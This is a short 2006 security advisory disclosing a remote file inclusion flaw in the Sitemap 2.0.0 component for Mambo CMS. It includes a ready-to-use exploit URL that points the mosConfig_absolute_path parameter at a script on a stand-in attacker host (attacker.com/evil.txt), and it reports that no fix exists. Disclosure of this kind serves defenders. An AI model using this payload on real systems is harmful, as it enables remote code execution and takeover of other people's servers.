Sitemap Mambo Component <= 2.0.0 Remote Include Vulnerability

2006-07-17 00:00:00

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

Author : Ahmad Maulana a.k.a Matdhule
Date : July 12th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
------------------------------------------------------------------------

Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip

Exploit:
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

#

Fixes

No fixes

In order to submit a new fix you need to be registered.